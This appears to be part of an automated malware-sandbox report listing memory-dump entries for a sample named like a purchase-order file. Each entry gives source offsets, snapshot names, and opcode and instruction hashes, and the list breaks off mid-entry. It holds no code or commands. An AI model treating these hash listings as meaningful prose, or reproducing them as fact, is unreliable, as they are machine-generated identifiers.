                                                          • Instruction Fuzzy Hash: E5813C35B10514DFCB04DF68D4A8A6DBBB6FF88711F1481A9E40A9B3A5CB74EC41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e0af1cd7c8515e26e799914565fc63ab84b07a9eb07c1fd325f5a51452e6287
                                                          • Instruction ID: 227b52bba764f562e4b7e359d8d5891cf6584d4675841d850892b987c9d87fb5
                                                          • Opcode Fuzzy Hash: 7e0af1cd7c8515e26e799914565fc63ab84b07a9eb07c1fd325f5a51452e6287
                                                          • Instruction Fuzzy Hash: F481D875A006188FCB14DF68C58499EBBF5FF88710B1985A9E8169B371DB70ED42CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e9c46cc9c870c923c81a127324198bc9ba088f92d957b7757d22f083366ddd1
                                                          • Instruction ID: 6ba82fbf69a7ce9e4873c56af8bdef71696c3f7a503936caa88d2fb3e2bbfa2a
                                                          • Opcode Fuzzy Hash: 6e9c46cc9c870c923c81a127324198bc9ba088f92d957b7757d22f083366ddd1
                                                          • Instruction Fuzzy Hash: 22818478A00208CFEB04DFA5D899BAE77F2FB84300F288169D406A7365DB749DC5CB65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17da1cc0eee2831c35d864b9b31a9198b1de4ed95084a29945eaac26065714c3
                                                          • Instruction ID: e8c1f4ab79588be96e87a64bba890ddffead34ebbcf263e1470ba5921e5a4668
                                                          • Opcode Fuzzy Hash: 17da1cc0eee2831c35d864b9b31a9198b1de4ed95084a29945eaac26065714c3
                                                          • Instruction Fuzzy Hash: 13815078A00208CFEB04DFA9D989BAD77F2FB84300F288169D406A7365DB749DC5CB65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 549b2b03e63596275d050cb7837a0a4a75d5d74e9a7a58586cfdce1a95024b2a
                                                          • Instruction ID: 63718156e08daa4d008e49254e460c59b2063e515fee8b4310bc3fbd2b97bf13
                                                          • Opcode Fuzzy Hash: 549b2b03e63596275d050cb7837a0a4a75d5d74e9a7a58586cfdce1a95024b2a
                                                          • Instruction Fuzzy Hash: 90617F35B012049FDB09DFA5D455BADBBB2FF88321F148069E816A7390CF75E941CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ca46f7f4f57bcd4aef9ce3002eceddb4682bb1a0624188be728df8a7896a52e
                                                          • Instruction ID: f87b70877dd74e9deeff9464ec870d45c24579fc7aabf3703f0682adc882a07c
                                                          • Opcode Fuzzy Hash: 5ca46f7f4f57bcd4aef9ce3002eceddb4682bb1a0624188be728df8a7896a52e
                                                          • Instruction Fuzzy Hash: 29614F78A40208CFEB04DF55D999BADB7F2FB48300F288169D406A7365DB749CC5CB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3f54d45f8260628cc92a57af4ed0530884f96930cabb2e3e3c6e2f07a0d6336
                                                          • Instruction ID: b854fc297e297a4c13c8258abdd952ae9e043e44c2f9c0dfe88e073efac12b1e
                                                          • Opcode Fuzzy Hash: f3f54d45f8260628cc92a57af4ed0530884f96930cabb2e3e3c6e2f07a0d6336
                                                          • Instruction Fuzzy Hash: C1614D78A40208CFEB04DF55D999BAEB7F2FB48300F288169D406A73A5DB749CC5CB64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24d3b352c8d9c5644b08204be69879aff758092e86f20bc6d66c982d3c949414
                                                          • Instruction ID: 48fedfff4d9e1f07b00b66853743245efed79f132700aefb8720f154e98676ca
                                                          • Opcode Fuzzy Hash: 24d3b352c8d9c5644b08204be69879aff758092e86f20bc6d66c982d3c949414
                                                          • Instruction Fuzzy Hash: 1A611B34B10614DFCB04DF68D898A6DBBB6FF88711F1481A9E8169B3A5DB70EC41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5420a4c6b387ab87aa8f78e2385043c01f682f8f99b963ecfdb461984c231a1a
                                                          • Instruction ID: 6c8fd234c231f8d40e94c86d08e06945fab0221827cacbf2ebdb8822ea172ce0
                                                          • Opcode Fuzzy Hash: 5420a4c6b387ab87aa8f78e2385043c01f682f8f99b963ecfdb461984c231a1a
                                                          • Instruction Fuzzy Hash: F7612370D09319CFDB29CF69D898BADBBF6BB49300F1095AAD489A7251DB745D81CF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55f20e72372d3d6c6cdc424518b14b6e01183f4de876f82e700a856f81259743
                                                          • Instruction ID: 5179ec5ab10939c2f64ffc35c6de7b50c37b85cd882da0ac55eff10abc48cc92
                                                          • Opcode Fuzzy Hash: 55f20e72372d3d6c6cdc424518b14b6e01183f4de876f82e700a856f81259743
                                                          • Instruction Fuzzy Hash: DE516935A112188FDB19CF65E554BADBBF2FF89321F2480A9E812A7390CB35E941CB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 06a5fb3a08d31a13b72e45e6eac46debb6c3684c2dcff6540656d94e1ecf2a22
                                                          • Instruction ID: 6edbc13936146fef995af0d83fe9245c65b1046a8983b551a0094448f05893bf
                                                          • Opcode Fuzzy Hash: 06a5fb3a08d31a13b72e45e6eac46debb6c3684c2dcff6540656d94e1ecf2a22
                                                          • Instruction Fuzzy Hash: A3513C34B10609DFCB04AF64E458ABD7BB6FF88705F108159E5069B3A8DF74A946CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af8a329afb9b95164aafeca5ed9dfc199a20bb008c2e5d95b7f76bd3bf31c630
                                                          • Instruction ID: 127e2d72ad1e0e09f1bb881156914d483f72fc1b2b095b14e0e6d3829f9894fb
                                                          • Opcode Fuzzy Hash: af8a329afb9b95164aafeca5ed9dfc199a20bb008c2e5d95b7f76bd3bf31c630
                                                          • Instruction Fuzzy Hash: 4551F0B4D0A21CCFDB14DFA9E844AEDBBB6FB89304F10A42AD415B7240DBB45985CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7b22e790655a0dd85f053307e369cbb04a6204c6ecf0baca31f536c08b66333
                                                          • Instruction ID: 1f6b90a515d25fdbba84f46fde8a9ee82eda013b30b97cb4044c4bd68f6b9bde
                                                          • Opcode Fuzzy Hash: a7b22e790655a0dd85f053307e369cbb04a6204c6ecf0baca31f536c08b66333
                                                          • Instruction Fuzzy Hash: 8C41E031B00604CFD744DF69E488BAAB3F2EB85351F6481B9D009DB26AC7B0DD81CB61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef39abf78ac7a4cf8f67f5f164e1e40a386bd758c197c0980151647827d7e58f
                                                          • Instruction ID: 5c2d4f0c59a1c5bd576a2aa4a0f3f2c86c495f6252c150c8f4b4a1308c18cbe2
                                                          • Opcode Fuzzy Hash: ef39abf78ac7a4cf8f67f5f164e1e40a386bd758c197c0980151647827d7e58f
                                                          • Instruction Fuzzy Hash: 52310AB0E44208DBDB09EFA9C4546ADBFB1FB8A301F00C4A9D429A7250DBB85D45CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed18fc504e31d5ab6e3a937aaaa5d9c609b51833938baba13b4ef0f0f20de88d
                                                          • Instruction ID: a13a002137da374698ee3c807d28119e798de2380d6a7980513d243fc82a91f5
                                                          • Opcode Fuzzy Hash: ed18fc504e31d5ab6e3a937aaaa5d9c609b51833938baba13b4ef0f0f20de88d
                                                          • Instruction Fuzzy Hash: 5D312B71E002089FCB09DFA9D4916EEBBB2FF88310F10806AE515A7365DB355941CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64b529fb8278035ab4ab5ae91fb29af333f2cce64fe6c0524ea7b6c88e5d1453
                                                          • Instruction ID: 94098c741371490e95fd887d18f3d6f2a7c9fff7a21672ba6048db99fd19ed64
                                                          • Opcode Fuzzy Hash: 64b529fb8278035ab4ab5ae91fb29af333f2cce64fe6c0524ea7b6c88e5d1453
                                                          • Instruction Fuzzy Hash: 2E216034B10A098FCB00EF69D5549AEB7B6FF89700F10416AD556A7360EF34AA46CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 304682309d40d577388c620bb034b847b484bf2ca873bc07b4d49b6da114f5b9
                                                          • Instruction ID: 8a10add044a20b029798b6b0483f770e3dd83eee9032575f6d502057973adf19
                                                          • Opcode Fuzzy Hash: 304682309d40d577388c620bb034b847b484bf2ca873bc07b4d49b6da114f5b9
                                                          • Instruction Fuzzy Hash: EE31A270D01209EFD704DFA9D0A87AEBBF1FB49300F90C0A9C408A7254D7B44A85CB55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29c79d2e85f7c8355313d36a74200a7bb9992a40be5e9d9d0298f6c52a2b9543
                                                          • Instruction ID: 394711dfddd7d232f1703d48058ceb4e73fa0dacc582541d09d866164ae54798
                                                          • Opcode Fuzzy Hash: 29c79d2e85f7c8355313d36a74200a7bb9992a40be5e9d9d0298f6c52a2b9543
                                                          • Instruction Fuzzy Hash: 9E315A30E44218DFEB28CF68C448BEDB7F2FB48365F2091A9D809A3245DB746985CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e8d2ec108149c09f489b301db7d1efb692aee7057941d6089198e19bb7cdaca
                                                          • Instruction ID: 3b645b891d2eb4cbe9b3fefc6cb8d26df69c062587d8979ebfe5b4843f0a83e3
                                                          • Opcode Fuzzy Hash: 0e8d2ec108149c09f489b301db7d1efb692aee7057941d6089198e19bb7cdaca
                                                          • Instruction Fuzzy Hash: 5321D574D04209CFDB08DFA9D4487EEBBF2EB89300F14C42AD555A3294DB749945DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 89faba89e28d932f861d8253feb5a3fcb194cbc9a6f44bae4f577b3a8a591947
                                                          • Instruction ID: e55fe931bb83e551c099eab8b644d245390d157acd589791864e700a535658cb
                                                          • Opcode Fuzzy Hash: 89faba89e28d932f861d8253feb5a3fcb194cbc9a6f44bae4f577b3a8a591947
                                                          • Instruction Fuzzy Hash: 20217C71E04209DFDB58DEB4C404BAEBBFAEB44360F5080E6D819DB294E635EB01CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1729797626.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_97d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14f271ebaea3f7b8b8f05eaa09443cafd3d77cea0f012033950efce7e32be99a
                                                          • Instruction ID: e127386deee7242c4e547eceef7589db73b3aab2a0e034d1f540e6b90e49532c
                                                          • Opcode Fuzzy Hash: 14f271ebaea3f7b8b8f05eaa09443cafd3d77cea0f012033950efce7e32be99a
                                                          • Instruction Fuzzy Hash: D82130B2505200DFCB04DF14C9C0B26BF7AFF98324F20C969E80D0B246C33AD846CAA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a03460bbcce7b0f67e972a80b62b0e1954245499d2077565c27f8768bf4a926
                                                          • Instruction ID: 279ae65d3fb01181c8b63f09f7de7bd337c61eb3012ae86a506b975ad4551737
                                                          • Opcode Fuzzy Hash: 3a03460bbcce7b0f67e972a80b62b0e1954245499d2077565c27f8768bf4a926
                                                          • Instruction Fuzzy Hash: AA315170D01209EFD704DFA9D0A87AEFBF1FB89304FA0C1A9D449A7254D7B44A85CB65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22e4381b6bcd78ef78c46a97b7b7294886f03c8a41371795a9deb216a168b9bf
                                                          • Instruction ID: c757c7e3e0f93c45aa74dd2390ebf7b097e0b6aec9ac69a3eb86df631a302834
                                                          • Opcode Fuzzy Hash: 22e4381b6bcd78ef78c46a97b7b7294886f03c8a41371795a9deb216a168b9bf
                                                          • Instruction Fuzzy Hash: 47217870D04219DBDB06DFA9D8446EEBBF6FB88306F00843AD409B7241DB785A45CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1729856874.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_98d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 639988da9f80989af28d924c311fa7165110ee88990b921e83c37bc3d5991244
                                                          • Instruction ID: fbba5eaa21eedfdef39a2a32849b3e6b1c9f965a5a53478ebac91f3af0e7ae19
                                                          • Opcode Fuzzy Hash: 639988da9f80989af28d924c311fa7165110ee88990b921e83c37bc3d5991244
                                                          • Instruction Fuzzy Hash: A02104B1509244DFDB15EF14D9C4B26BF69FB84314F24CA69E9094B386C33AD807DBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1729856874.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_98d000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f3db7a72d49c81ca38aa7a1ee90aca8375db685d2b99f9bc3c3b79558c5f688
                                                          • Instruction ID: 10addcb800eaba553ae56c9bc33aaa609eea2ab7a2c661fd8edbcdc0acd5e969
                                                          • Opcode Fuzzy Hash: 5f3db7a72d49c81ca38aa7a1ee90aca8375db685d2b99f9bc3c3b79558c5f688
                                                          • Instruction Fuzzy Hash: 4B215E7150E3C09FCB079F24D994716BF75AF46214F1981DBD8848F2A7C33A981ACBA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21f261f097c79c003e73d404fc24ef08b8fb0c808ab684067327fe7fb6f7f13a
                                                          • Instruction ID: 8614b7f3a2ae77e841b74ab7eca3524779da51376153e8113681fbba7fae67c4
                                                          • Opcode Fuzzy Hash: 21f261f097c79c003e73d404fc24ef08b8fb0c808ab684067327fe7fb6f7f13a
                                                          • Instruction Fuzzy Hash: A2212936600105DFCB05DFA8E998E99BFB2FF49310B0640A9F6099B272C731EC15DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1855e6776ec46924f53b442bb12ac8417fc82be29cbb7231ce6b1f979fe5687d
                                                          • Instruction ID: 1747e3fd4ac41140c43b82870af90ca11c2cbed6b4e6942e04829641b62aa4ac
                                                          • Opcode Fuzzy Hash: 1855e6776ec46924f53b442bb12ac8417fc82be29cbb7231ce6b1f979fe5687d
                                                          • Instruction Fuzzy Hash: 59214C75A10108DBCB199FA8D844AEE7FB6FB8C321F14956AE911B7390CF75A841CF90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6a9192e6887e09c92390a03de864989759d4427a8cb7d5fd15e34d9a2832325
                                                          • Instruction ID: 02dfccbd95ca09d26dba97ea837512a32556aa187e86e5cd01aeaff6e6f701f3
                                                          • Opcode Fuzzy Hash: b6a9192e6887e09c92390a03de864989759d4427a8cb7d5fd15e34d9a2832325
                                                          • Instruction Fuzzy Hash: 62212570D05219CBDB06DFAAD5446EEBBF6FB88302F00842AD009B7241DB785A44CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 945ed340fde5738619ba1251db5a8c863c7d0f492b0d6a51262b67132f781983
                                                          • Instruction ID: 336332561ba8fe7337711ef4a68f7cae1b130ace9053374cfda0a24695ea50a7
                                                          • Opcode Fuzzy Hash: 945ed340fde5738619ba1251db5a8c863c7d0f492b0d6a51262b67132f781983
                                                          • Instruction Fuzzy Hash: 2021E675A002098FDF05DF94D585AEDBBF6FF88310F2045A5E405BB2A5CB75AD41CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4367b0866af70f94489ee0d75e8b45d229e7cdeb7bd4c7217090c97f5a53f620
                                                          • Instruction ID: 08e670a9f5367ddb48798b4b5f5beab7ca8472eeb198a65c19b9de0988a58378
                                                          • Opcode Fuzzy Hash: 4367b0866af70f94489ee0d75e8b45d229e7cdeb7bd4c7217090c97f5a53f620
                                                          • Instruction Fuzzy Hash: 20212CB0E04309DFCB15DFA9C584ABEBBB6FB49700F10C56AD819A7244DB749982CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db9af418dcee9c858710ec6d1bd23787f495a7c784996d67efa3d507c9323903
                                                          • Instruction ID: 21c8246fe4ebcee165b09ce1fd9895f65b69e141912d5a2c3530aad5ff9ddb8d
                                                          • Opcode Fuzzy Hash: db9af418dcee9c858710ec6d1bd23787f495a7c784996d67efa3d507c9323903
                                                          • Instruction Fuzzy Hash: D5215E75A006158FCB18DF65D845BAFBBF2FF88664F008979D906A7395EB34A801CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a5d5a06919498d2639dca1b6a7d41ff597642f0f10334a59c5200b9ad8a390a
                                                          • Instruction ID: 8a7ba79521b9eac6b1043d1c8b7bb2a454f9521a768b31e3f7f1cb202dd98114
                                                          • Opcode Fuzzy Hash: 1a5d5a06919498d2639dca1b6a7d41ff597642f0f10334a59c5200b9ad8a390a
                                                          • Instruction Fuzzy Hash: BF21F671A00209CFDB19DFA4C585AAE77F6FF88300F2145A5E405BB3A5CB75AD41CBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 259f0d4e68e623d1a25b115d54be102df554e0f8a770d1c8c1e57ae1f3e2a855
                                                          • Instruction ID: 183fa4dce50ca047a50535ce4294157b67c8587536b5c2a52e1e9cdda7018e24
                                                          • Opcode Fuzzy Hash: 259f0d4e68e623d1a25b115d54be102df554e0f8a770d1c8c1e57ae1f3e2a855
                                                          • Instruction Fuzzy Hash: 37211632900248CFDB60CF6CD8497AE77B0EB08314F295869C18AE7250C774EE84DF65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07425601d75a6e0451ce4f074d6714dcf8a00f0474330c640d6edb67338441d5
